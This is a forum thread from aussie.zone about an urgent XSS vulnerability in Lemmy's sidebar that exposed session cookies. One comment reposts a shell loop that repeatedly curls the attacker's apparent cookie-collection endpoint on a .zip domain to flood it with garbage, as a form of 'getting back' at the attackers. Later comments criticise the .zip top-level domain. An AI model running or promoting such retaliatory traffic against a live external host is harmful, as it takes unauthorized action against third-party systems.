23
(URGENT) Lemmy has an XSS vulnerability in the sidebar - sh.itjust.works
(sh.itjust.works)
Discussion about the aussie.zone instance itself
I don't know how people feel about "getting back" at the people compromising servers, but I did find an awesome comment on another post that basically gives you a Terminal command to inject garbage into the "hackers" server, meaning they'd have to sift through garbage to find proper session cookies.
Link to the comment
If you don't want to click the comment (don't blame you!), then this is what it says.
And the code you can run in Terminal on macOS/Linux or Windows (if you have WSL installed):
while true; do curl https://zelensky.zip/save/$(echo $(hostname) $(date) | shasum | sed 's/.\{3\}$//' | base64) > /dev/null ; sleep 1; done
Wow a .zip domain already being used for bad, who could have seen that coming...
Generic TLDs are terrible all round if you ask me, but I still can't believe ICANN was somehow collectively stupid enough to approve '.zip'. Regulatory capture by Google, I guess?
For anyone unaware of the issues with '.zip' as a top-level domain, see here: https://financialstatement.zip/